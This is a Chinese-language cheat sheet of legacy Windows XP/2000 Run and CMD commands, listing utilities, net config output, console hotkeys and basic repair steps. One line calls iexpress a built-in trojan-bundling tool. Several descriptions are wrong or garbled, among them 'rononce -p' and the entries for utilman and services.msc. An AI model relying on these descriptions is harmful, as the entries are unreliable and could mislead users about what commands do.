nslookup ip地址侦测器

fsmgmt.msc 共享文件夹管理器

utilman 辅助工具管理器

gpedit.msc 组策略

以下为Windows操作系统的常用运行命令,执行这些命令,就能打开系统对应的相关实用程序,如果大家能基本利用,就能检查并修复系统的最基本的故障,除注销,关闭系统命令外,其它所有命令,大家不妨一试!!

运行\输入CMD\输入 对应的相关实用程序:
. 打开C:\Documents and Settings\XXX(当前登录Windows XP的用户名)
.. 打开Windows XP所在的盘符下的Documents and Settings文件夹
... 打开“我的电脑”选项。
accwiz.exe 辅助工具向导
actmovie.exe 直接显示安装工具
append.exe 允许程序打开制定目录中的数据
arp.exe 显示和更改计算机的IP与硬件物理地址的对应列表
at.exe 计划运行任务
atmadm.exe ATM调用管理器统计
attrib.exe 显示和更改文件和文件夹属性
autochk.exe 检测修复文件系统 (XP不可用)
autoconv.exe 在启动过程中自动转化系统 (XP不可用)
autofmt.exe 在启动过程中格式化进程 (XP不可用)
autolfn.exe 使用长文件名格式 (XP不可用)
arp.exe 显示和更改计算机的IP与硬件物理地址的对应
calc.exe 计算器
Bootvrfy.exe 通报启动成功
cacls.exe 显示和编辑ACL
cdplayer.exe CD播放器
change.exe 与终端服务器相关的查询 (XP不可用)
charmap.exe 字符映射表
chglogon.exe 启动或停用会话记录 (XP不可用)
chgport.exe 改变端口(终端服务) (XP不可用)
chgusr.exe 改变用户(终端服务) (XP不可用)
chkdsk.exe 磁盘检测程序
chkntfs.exe NTFS磁盘检测程序
cidaemon.exe 组成Ci文档服务
cipher.exe 在NTFS上显示或改变加密的文件或目录
cisvc.exe 打开索引内容
ckcnv.exe 变换Cookie
cleanmgr.exe 磁盘清理
cliconfg.exe SQL客户网络工具
clipbrd.exe 剪贴簿查看器
clipsrv.exe 运行Clipboard服务
clspack.exe 建立系统文件列表清单
cluster.exe 显示域的集群 (XP不可用)
cmd.exe 进2000\XP DOS
cmdl32.exe 自动下载连接管理
cmmgr32.exe 连接管理器
cmmon32.exe 连接管理器监视
cmstp.exe 连接管理器配置文件安装程序
comclust.exe 集群
comp.exe 比较两个文件和文件集的内容
conf 启动netmeeting聊天工具
control userpasswords2 XP密码管理.
compmgmt.msc 计算机管理
cprofile.exe 转换显示模式 (XP不可用)
开始,运行,输入CMD\输入net config workstation计算机名 \完整的计算机名\用户名
工作站处于活动状态(即网络描述) \软件版本(即软件版本号) \工作站域 工作站域的 DNS 名称
登录域 \COM 打开时间超时(秒) \COM 发送量(字节) \COM 发送超时 (msec)
CMD\输入net config workstation 更改可配置工作站服务设置。
CMD\输入net config server 可以显示不能配置的下服务器计算机名 \服务器注释 \服务器版本(即软件版本号)
服务器处于活动状态(即网络描述) \服务器处于隐藏状态(即 /hidden 设置)
最大登录用户数(即可使用服务器共享资源的最大用户数)
每个会话打开文件的最大数(即用户可在一个会话中打开服务器文件的最大数)
空闲会话时间(最小值)
chkdsk.exe 磁盘检查.
Chkdsk /r 2000命令控制台中的Chkdsk /r命令检查修复系统文件
cleanmgr 垃圾整理
Clipbrd 剪贴板查看器
C:boot.ini 打开启动菜单
compact.exe 显示或改变NTFS分区上文件的压缩状态
conime.exe IME控制台
control.exe 控制面板
convert.exe NTFS 转换文件系统到NTFS
convlog.exe 转换IIS日志文件格式到NCSA格式
cprofile.exe 转换显示模式
cscript.exe 较本宿主版本
csrss.exe 客户服务器Runtime进程 (XP不可用)
csvde.exe 格式转换程序 (XP不可用)
dcpromo 活动目录安装(XP不可用)
drwtsn32 系统医生
diskmgmt.msc 磁盘管理器(和PowerQuest PartitionMagic 8.0)
dvdplay DVD 播放器
devmgmt.msc 设备管理器(检查电脑硬件,驱动)
dxdiag 检查DirectX信息
dcomcnfg.exe DCOM配置属性 (控制台根目录)
dcpromo.exe 安装向导 (XP不可用)
ddeshare.exe DDE共享
debug.exe 检查DEBUG
dfrgfat.exe FAT分区磁盘碎片整理程序
dfrgntfs.exe NTFS分区磁盘碎片整理程序 (XP不可用)
dfs_cmd_.exe 配置DFS树 (XP不可用)
dfsinit.exe 分布式文件系统初始化(XP不可用)
dfssvc.exe 分布式文件系统服务器 (XP不可用)
diantz.exe 制作CAB文件
diskperf.exe 磁盘性能计数器
dmremote.exe 磁盘管理服务的一部分 (XP不可用)
doskey.exe 命令行创建宏
dosx.exe DOS扩展
dplaysvr.exe 直接运行帮助 (XP不可用)
drwatson.exe 华生医生错误检测
drwtsn32.exe 华生医生显示和配置管理
dvdplay.exe DVD播放
dxdiag.exe Direct-X诊断工具
edlin.exe 命令行的文本编辑
esentutl.exe MS数据库工具
eudcedit.exe 造字程序
eventvwr.exe 事件查看器
exe2bin.exe 转换EXE文件到二进制
expand.exe 解压缩
extrac32.exe 解CAB工具
fsmgmt.msc 共享文件夹
fastopen.exe 快速访问在内存中的硬盘文件
faxcover.exe 传真封面编辑
faxqueue.exe 显示传真队列
faxsend.exe 发送传真向导
faxsvc.exe 启动传真服务
fc.exe 比较两个文件的不同
find.exe 查找文件中的文本行
findstr.exe 查找文件中的行
finger.exe 一个用户并显示出统计结果
fixmapi.exe 修复MAPI文件
flattemp.exe 允许或者禁用临时文件目录 (XP不可用)
fontview.exe 显示字体文件中的字体
forcedos.exe 强制文件在DOS模式下运行
ftp.exe FTP下载
gpedit.msc 组策略
gdi.exe 图形界面驱动
grpconv.exe 转换程序管理员组
hostname.exe 显示机器的Hostname
Internat 输入法图标
iexpress 木马捆绑工具,系统自带
ieshwiz.exe 自定义文件夹向导
iexpress.exe iexpress安装包
iisreset.exe 重启IIS服务(未安装IIS,不可用)
internat.exe 键盘语言指示器 (XP不可用)
ipconfig.exe 查看IP配置
ipsecmon.exe IP安全监视器
ipxroute.exe IPX路由和源路由控制程序
irftp.exe 无线连接
ismserv.exe 安装或者删除Service Control Manager中的服务
jdbgmgr.exe Java4的调试器
jetconv.exe 转换Jet Engine数据库 (XP不可用)
jetpack.exe 压缩Jet数据库 (XP不可用)
jview.exe Java的命令行装载者
label.exe 改变驱动器的卷标
lcwiz.exe 许可证向导 (XP不可用)
ldifde.exe LDIF目录交换命令行管理 (XP不可用)
licmgr.exe 终端服务许可协议管理 (XP不可用)
lights.exe 显示连接状况 (XP不可用)
llsmgr.exe Windows 2000 许可协议管理 (XP不可用)
llssrv.exe 启动许可协议服务器 (XP不可用)
locator.exe RPC Locator 远程定位
lodctr.exe 调用性能计数
logoff.exe 注销当前用户
lpq.exe 显示远端的LPD打印队列的状态,显示被送到基于Unix的服务器的打印任务
lpr.exe 用于Unix客户打印机将打印任务发送给连接了打印设备的NT的打印机服务器。
lsass.exe 运行LSA和Server的DLL
lserver.exe 指定默认Server新的DNS域 (XP不可用)
lusrmgr.msc 本地账户管理
mmc 控制台
mplayer2 播放器
macfile.exe 管理MACFILES (XP不可用)
magnify.exe 放大镜
makecab.exe 制作CAB文件
mem.exe 显示内存状态
migpwd.exe 迁移密码
mmc.exe 控制台
mnmsrvc.exe 远程桌面共享
mobsync.exe 同步目录管理器
mountvol.exe 创建、删除或列出卷的装入点。
mplay32.exe Media Player 媒体播放器
mpnotify.exe 通知应用程序
mqbkup.exe 信息队列备份和恢复工具
mqmig.exe MSMQ Migration Utility 信息队列迁移工具
mrinfo.exe 使用SNMP多点传送路由
mscdexnt.exe 安装MSCD
msdtc.exe 动态事务处理控制台
msg.exe 发送消息到本地或远程客户
mshta.exe HTML应用程序主机
msiexec.exe 开始Windows安装程序
mspaint.exe 打开画图板
mstask.exe 任务计划表程序
mstinit.exe 任务计划表安装
Msconfig.exe 系统配置实用程序 (配置启动选项,服务项)
mem.exe 显示内存使用情况
mspaint 画图板
Net Stop Messenger 停止信使服务
Net Start Messenger 恢复信使服务
nslookup 网络管理的工具
Nslookup IP 地址侦测器
ntbackup 系统备份和还原
nbtstat.exe 使用 NBT(TCP/IP 上的 NetBIOS)显示协议统计和当前 TCP/IP 连接。
nddeapir.exe NDDE API服务器端
netsh.exe 用于配置和监控 Windows 2000 命令行脚本接口(XP不可用)
netstat.exe 显示协议统计和当前的 TCP/IP 网络连接。
nlsfunc.exe 加载特定国家的信息。Windows 2000 和 MS-DOS 子系统不使用该命令接受该命令只是为了与 MS-DOS 文件兼容。
notepad.exe 打开记事本
nslookup.exe 该诊断工具显示来自域名系统 (DNS) 名称服务器的信息。
ntbackup.exe 备份和故障修复工具
ntfrs.exe NT文件复制服务 (XP不可用)
ntvdm.exe 模拟16位Windows环境
nw16.exe NetWare转向器
nwscript.exe 运行Netware脚本
odbcad32.exe 32位ODBC数据源管理 (驱动程序管理)
odbcconf.exe 命令行配置ODBC驱动和数据源
packager.exe 对象包装程序
pathping.exe 包含Ping和Tracert的程序
pentnt.exe 检查Pentium的浮点错误
perfmon.exe 系统性能监视器
ping.exe 验证与远程计算机的连接
posix.exe 用于兼容Unix
print.exe 打印文本文件或显示打印队列的内容。
progman.exe 程序管理器
psxss.exe Posix子系统应用程序
qappsrv.exe 在网络上显示终端服务器可用的程序
qprocess.exe 在本地或远程显示进程的信息(需终端服务)
query.exe 查询进程和对话 (XP不可用)
quser.exe 显示用户登陆的信息(需终端服务)
qwinsta.exe 显示终端服务的信息
rononce -p 15秒关机
rasAdmin 远程访问服务.
regedit.exe 注册表编辑器
rasadmin.exe 启动远程访问服务 (XP不可用)
rasautou.exe 建立一个RAS连接
rasdial.exe 宽带,拨号连接
ras.exe 运行RAS连接 (XP不可用)
rcp.exe 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制文件
rdpclip.exe 终端和本地复制和粘贴文件
recover.exe 从坏的或有缺陷的磁盘中恢复可读取的信息。
redir.exe 运行重定向服务
regedt32.exe 32位注册服务
regini.exe 用脚本修改注册许可
regwiz.exe 注册向导
replace.exe 用源目录中的同名文件替换目标目录中的文件。
rexec.exe rexec 命令在执行指定命令前,验证远程计算机上的用户名,只有安装了 TCP/IP 协议后才可以使用该命令。
risetup.exe 运行远程安装向导服务 (XP不可用)
route.exe 控制网络路由表
rsh.exe 在运行 RSH 服务的远程计算机上运行命令
rsnotify.exe 远程存储通知回显
runas.exe 允许用户用其他权限运行指定的工具和程序
rundll32.exe 启动32位DLL程序
rwinsta.exe 重置会话子系统硬件和软件到最初的值
Sndvol32 音量控制程序
sfc.exe 或CMD\ sfc.exe 回车 系统文件检查器
services.msc 网络连接服务
syskey 系统加密,(一旦加密就不能解开,保护windows xp系统的双重密码wupdmgr WIDNOWS UPDATE)
SCANREG/RESTORE 命令恢复最近的注册表
secedit.exe 自动化安全性配置管理
services.exe 控制所有服务
sethc.exe 设置高对比
setver.exe 设置 MS-DOS 子系统向程序报告的 MS-DOS 版本号
sfc.exe 系统文件检查
shadow.exe 监控另外一台中端服务器会话
shrpubw.exe 建立和共享文件夹
sigverif.exe 文件签名验证
smlogsvc.exe 性能日志和警报 (XP不可用)
sndrec32.exe 录音机
sndvol32.exe 显示声音控制信息
snmp.exe 简单网络管理协议 (XP不可用)
snmptrap.exe SNMP工具 (XP不可用)
srvmgr.exe 服务器管理器 (XP不可用)
subst.exe 将路径与驱动器盘符关联
sysedit.exe 系统配置编辑器
syskey.exe NT账号数据库加密工具
sysocmgr.exe > Windows 安装程序
systray.exe 在低权限运行systray
taskmgr 任务管理器
tasklist /svc(CMD)了解每个SVCHOST进程到底提供了多少系统服务(2000\98不可用)
tlist -S(CMD) 了解每个SVCHOST进程到底提供了多少系统服务(
taskman.exe 任务管理器 (XP不可用)
taskmgr.exe 任务管理器
tcmsetup.exe 电话服务客户安装
tcpsvcs.exe TCP服务
termsrv.exe 终端服务
tftp.exe 将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远程计算机传输文件
themes.exe 桌面主题 (XP不可用)
tlntadmn.exe Administrator Telnet服务管理
tlntsess.exe 显示目前的Telnet会话
tlntsvr.exe 开始Telnet服务
tracert.exe 诊断实用程序将包含不同生存时间 (TTL) 值的 Internet 控制消息协议 (ICMP) 回显数据包发送到目标,以决定到达目标采用的路由
tsadmin.exe Administrator 终端服务管理器 (XP不可用)
tscon.exe 粘贴用户会话到终端对话
tsdiscon.exe 断开终端服务的用户
tskill.exe 杀掉终端服务
tsprof.exe 用终端服务得出查询结果
tsshutdn.exe 关闭系统
unlodctr.exe 性能监视器的一部分
upg351db.exe 升级Jet数据库 (XP不可用)
ups.exe UPS service UPS服务
user.exe Windows核心服务
userinit.exe 打开我的文档
usrmgr.exe 域用户管理器
utilman.exe 指定2000启动时自动打开那台机器
vwipxspx.exe 调用IPX/SPX VDM
w32tm.exe 时间服务器
wextract.exe 解压缩Windows文件
winchat.exe 打开Windows聊天工具
winhlp32.exe 运行帮助系统
winmsd.exe 查看系统信息
winver.exe 显示Windows版本
wizmgr.exe Windows管理向导 (XP不可用)
wjview.exe Java 命令行调用Java
write.exe 打开写字板
wscript.exe 脚本工具
wupdmgr.exe Windows update 运行Windows update升级向导
winver 检查Windows版本
Win98系统工具
开始,运行,输入Msconfig 系统配置实用工具 配置启动选项,包括config.sys、autoexec.bat、win.ini、system.ini和注册表及程序菜单中的启动项。并可设置是否故障启动。
开始,运行,输入Regedit 注册表修改工具 注册表编辑器,如果没有把握不要随意修改注册表!
开始,运行,输入Regsvr32 dll注册工具 当提示找不到dll文件时,可用此来注册该动态连接库。
开始,运行,输入Regwiz 注册向导 用于注册。校验系统文件,并可恢复系统文件。
如果启动时出现类似*.vxd文件错误,可用此恢复该vxd文件。
开始,运行,输入Scandskw 磁盘扫描程序,用于扫描修复磁盘。如果磁盘或文件出现错误,可用来初步修复。
开始,运行,输入DxDiag DirectX诊断工具可用于检测DirectX运行是否正常。
开始,运行,输入NETSCAPE

ESC:清除当前命令行;
F7:显示命令历史记录,以图形列表窗的形式给出所有曾经输入的命令,并可用上下箭头键选择再次执行该命令。
F8:搜索命令的历史记录,循环显示所有曾经输入的命令,直到按下回车键为止;
F9:按编号选择命令,以图形对话框方式要求您输入命令所对应的编号(从0开始),并将该命令显示在屏幕上;
Ctrl+H:删除光标左边的一个字符;
Ctrl+C Ctrl+Break,强行中止命令执行;
Ctrl+M:表示回车确认键;
Alt+F7:清除所有曾经输入的命令历史记录;
Alt+PrintScreen:截取屏幕上当前命令窗里的内容。
病毒破坏了系统文件,请使用杀毒软件查杀病毒,然后利用Windows 2000提供的“命令控制台”中的Chkdsk /r命令检查修复系统文件即可。

按F8进入DOS模式,运行SCANREG/RESTORE命令恢复最近的注册表
按F8进入安全模式,在运行里输入SFC,系统文件检查

热点内容
凤凰地下商城wifi密码是多少 发布:2025-02-04 14:42:00 浏览:903
哈希查找算法 发布:2025-02-04 14:40:36 浏览:465
云服务器显示黑洞 发布:2025-02-04 14:29:05 浏览:300
redhatlinux教程 发布:2025-02-04 14:24:48 浏览:831
nvidia缓存清理吗 发布:2025-02-04 14:16:55 浏览:307
笔记本电脑如何设置锁屏密码 发布:2025-02-04 13:54:42 浏览:163
构成c语言程序的基本单位 发布:2025-02-04 13:49:53 浏览:990
如何修改已经更改的密码 发布:2025-02-04 13:38:38 浏览:776
唐dm2021买哪个配置划算 发布:2025-02-04 13:38:38 浏览:628
真空压缩重 发布:2025-02-04 13:38:37 浏览:643